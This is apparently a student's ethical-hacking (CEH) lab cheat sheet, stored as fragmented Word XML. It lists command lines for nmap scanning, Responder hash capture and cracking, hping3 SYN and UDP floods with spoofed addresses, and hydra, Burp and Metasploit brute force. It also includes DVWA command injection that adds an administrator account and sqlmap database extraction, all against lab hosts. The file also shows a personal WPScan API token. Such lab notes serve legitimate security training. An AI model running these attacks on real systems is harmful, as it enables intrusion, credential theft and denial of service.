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B0A2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Lab1-Task1: Host discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F13D0C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-PR [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BFDB7E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-sn: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Disable port scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205413FE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-PR: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ARP ping scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548FB8FC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-PU [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B880DA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-PU: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UDP ping scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4933F4D9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-PE [IP or IP Range]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694517E0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-PE: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ICMP ECHO ping scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB1CD8F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-PP [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3227B0FB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-PP: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ICMP timestamp ping scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BD5258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-PM [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750CC68B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-PM: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ICMP address mask ping scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0629B4C4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-PS [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090876D5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-PS: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TCP SYN Ping scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C382A0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-PA [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B770545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-PA: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TCP ACK Ping scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20121D68" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525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-sn -PO [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FEE3A3" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525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-PO: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IP Protocol Ping scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6FE1A5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Lab2-Task3: Port and Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1130537B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-sT -v [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FF55AD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-sT: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TCP connect/full open scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8685F8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-v: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Verbose output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CE56CE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-sS -v [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E50343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-sS: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Stealth scan/TCP hall-open scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BB06CC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-sX -v [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42007156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-sX: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Xmax scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2608D70C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-sM -v [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2EA2EE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-sM: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TCP Maimon scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D4772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-sA -v [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381AC917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-sA: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ACK flag probe scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A147AD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-sU -v [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2447AD43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-sU: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UDP scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCEAF17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-sI -v [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501FF7B2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-sI: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IDLE/IPID Header scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756E48B1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nmap -sY -v [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E7B71F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-sY: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SCTP INIT Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E68EDD0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-sZ -v [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A781E55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-sZ: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SCTP COOKIE ECHO Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D304738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-sV -v [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00290CDC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-sV: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Detect service versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DEFB69" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525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-A -v [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225FBA6C" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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-A: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Aggressive scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7F89D7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Lab3-Task2: OS Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D7D752" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525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-A -v [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636C32F0" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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-A: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Aggressive scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EB0C56" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525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-O -v [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C450F56" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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-O: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OS discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006A5D1E" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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 –script smb-os-discovery.nse [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B82F994" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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-–script: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Specify the customized script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAD66A7" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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smb-os-discovery.nse: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Determine the OS, computer name, domain, workgroup, and current time over the SMB protocol (Port 445 or 139)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2947E960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04: Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D0DBCB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Lab2-Task1: Enumerate SNMP using snmp-check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558CE55E" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525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nmap -sU -p 161 [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19483333" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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snmp-check [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E0DC29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Addition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6ABFF3" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525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nbtstat -a [IP] (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C52A9D1" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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nbtstat -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A498DEA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06: System Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D645CB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Lab1-Task1: Perform Active Online Attack to Crack the System's Password using Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114032EC" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EE47B9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4262B1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Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D0FC04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chmox +x ./Responder.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7360E584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sudo ./Responder.py -I eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6751DE67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passwd: ****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACE1386" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECFCA0E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648754C6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\CEH-Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CC1A07" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0F602D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Home/Responder/logs/SMB-NTMLv2-SSP-[IP].txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE96BD3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sudo snap install john-the-ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DA5072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passwd: ****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264D1A9B" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77026314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Lab3-Task6: Covert Channels using Covert_TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319FEE01" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7A5A07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Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DCAB30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mkdir Send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A038CF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Send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B05E73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echo "Secret"-&gt;message.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D24485A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Place-&gt;Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F89816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Ctrl+L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EF5358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smb://[IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325D1828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Account &amp; Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3874916C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copy and paste covert_tcp.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFBB360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cc -o covert_tcp covert_tcp.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551D4D3B" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6028A4E0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tcpdump -nvvx port 8888 -I lo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124A1A6B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Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE423B5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mkdir Receive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3AB05F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Receive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8CE948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File-&gt;Ctrl+L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DE2E8B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smb://[IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAC7DF6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copy and paste covert_tcp.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06691CB0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cc -o covert_tcp covert_tcp.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E4902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./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/Receive/receive.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC386A0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Tcpdump captures no packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04108B1C" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B562A1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./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -source_port 8888 -dest_port 9999 -file /home/attacker/Desktop/send/message.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E956979" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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Wireshark (message string being send in individual packet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FBF62A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08: Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F6D5F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Lab2-Task1: Password Sniffing using Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB38D42" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3EFC35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Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175E784A" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E396C40" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00000000" w:rsidP="00C525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www.moviescope.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BFAA406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Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79734CAC" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57516229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Stop capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682FAC83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File-&amp;gt;Save as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FA13D5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Filter: </w:t>
      </w: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http.request.method==POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD7779F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RDP log in Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2814CCCE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service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4101BD99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start Remote Packet Capture Protocol v.0 (experimental)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD36A59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Log off Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA3DB62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Wireshark-&amp;gt;Capture options-&amp;gt;Manage Interface-&amp;gt;Remote Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78240C99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 a remote host and its interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A044D29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Fill info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3210CFDF" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A037DC5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Log in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FCCDA8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Browse website and log in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376A4667" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031BA2E2" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Get packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56446AD4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10: Denial-of-Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C31FBC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Lab1-Task2: Perform a DoS Attack on a Target Host using hping3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA53C2C" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77024BC2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Wireshark-&amp;gt;Ethernet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E214159" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD4AE26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hping3 -S [Target IP] -a [Spoofable IP] -p 22 -flood</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1629D833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-S: Set the SYN flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E57E1AF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-a: Spoof the IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C79E983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-p: Specify the destination port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0038DC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--flood: Send a huge number of packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F92038C" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9EF178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Check wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA259BD" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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 (Perform PoD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12599D00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hping3 -d 65538 -S -p 21 –flood [Target IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E8CDDD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-d: Specify data size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082E47FE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-S: Set the SYN flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728C914B" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Attacker (Perform UDP application layer flood attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AEE907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nmap -p 139 10.10.10.19 (check service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722E71E7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hping3 -2 -p 139 –flood [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD4AC3E" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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-2: Specify UDP mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE0B425" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Other UDP-based applications and their ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066BBF65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CharGen UDP Port 19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9A31E6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SNMPv2 UDP Port 161</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7924D7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QOTD UDP Port 17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E870F51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RPC UDP Port 135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E636DA4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SSDP UDP Port 1900</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277216E7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CLDAP UDP Port 389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE56C17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TFTP UDP Port 69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227095D5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NetBIOS UDP Port 137,138,139</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5430E04C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NTP UDP Port 123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219AE3B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Quake Network Protocol UDP Port 26000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3DF97B" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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VoIP UDP Port 5060</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A98BAD4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13: Hacking Web Servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20441402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Lab2-Task1: Crack FTP Credentials using a Dictionary Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC06505" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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nmap -p 21 [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F057EA" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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hydra -L usernames.txt -P passwords.txt ftp://10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5069A9D0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14: Hacking Web Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A4696F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Lab2-Task1: Perform a Brute-force Attack using Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6D64C5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 proxy for browser: 127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BFC22C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Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2888C071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Type random credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214B7A35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capture the request, right click-&amp;gt;send to Intrucder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679BFDD9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Intruder-&amp;gt;Positions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66664951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Clear $</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D17A04F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Attack type: Cluster bomb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6DE885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 account and password value, Add $</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297DE67F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Payloads: Load wordlist file for set 1 and set 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E00681B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start attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A6C912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filter status==302</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297C9BA5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 the raw, get the credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6BD632" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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recover proxy settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4004FA0E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Lab2-Task3: Exploit Parameter Tampering and XSS Vulnerabilities in Web Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F9C647" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Log in a website, change the parameter value (id )in the URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E384772" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Conduct a XSS attack: Submit script codes via text area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701995FC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Lab2-Task5: Enumerate and Hack a Web Application using WPScan and Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209BDFE2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wpscan --api-token hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads --url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hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00C525F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http://10.10.10.16:8080/CEH</w:t>
        </w:r>
      </w:hyperlink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--plugins-detection aggressive --enumerate u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E893FB" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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--enumerate u: Specify the enumeration of users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7381C478" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525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API Token: Register at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hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00C525F5">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:b/>
            <w:bCs/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>https://wpscan.com/register</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="545B29F3" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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Mine: hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486540F2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service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F794C71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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7684A9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 auxiliary/scanner/http/wordpress_login_enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCC19BE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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D045967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set PASS_FILE password.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE693EB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set RHOST 10.10.10.16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC56D7F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set RPORT 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230673C9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set TARGETURI</w:t>
      </w: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hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00C525F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http://10.10.10.16:8080/CEH</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4994A6E8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set USERNAME admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D3F7A8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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD0DF04" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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Find the credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24088761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Lab2-Task6: Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server (DVWA low level security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E4F81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found command injection vulnerability in an input textfield</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7CFBB4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| hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D0FB57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| whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5446EF01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| tasklist| Taskkill /PID /F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404BCE42" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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/PID: Process ID value od the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37348C19" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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/F: Forcefully terminate the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF77EA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| dir C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED84E3B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| net user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3E21F2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| net user user001 /Add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A92C23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| net user user001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0F11C8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| net localgroup Administrators user001 /Add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2A020C" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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 created account user001 to log in remotely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599D3869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15: SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F89FADE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Lab1-Task2: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6A17F9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Login a website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60269913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Inspect element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CB6437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Dev tools-&amp;gt;Console: document.cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD0648D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sqlmap -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00C525F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http://www.moviescope.com/viewprofile.aspx?id=1</w:t>
        </w:r>
      </w:hyperlink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" --cookie="value" –dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AE5582" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F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-u: Specify the target URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68131F6F" w14:textId="77777777" w:rsidR="00C525F5" w:rsidRPr="00C525F5" w:rsidRDefault="00C525F5" w:rsidP="00C525F5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--cookie: Specify the HTTP cookie header value</w:t>
      </w:r>
    </w:p>
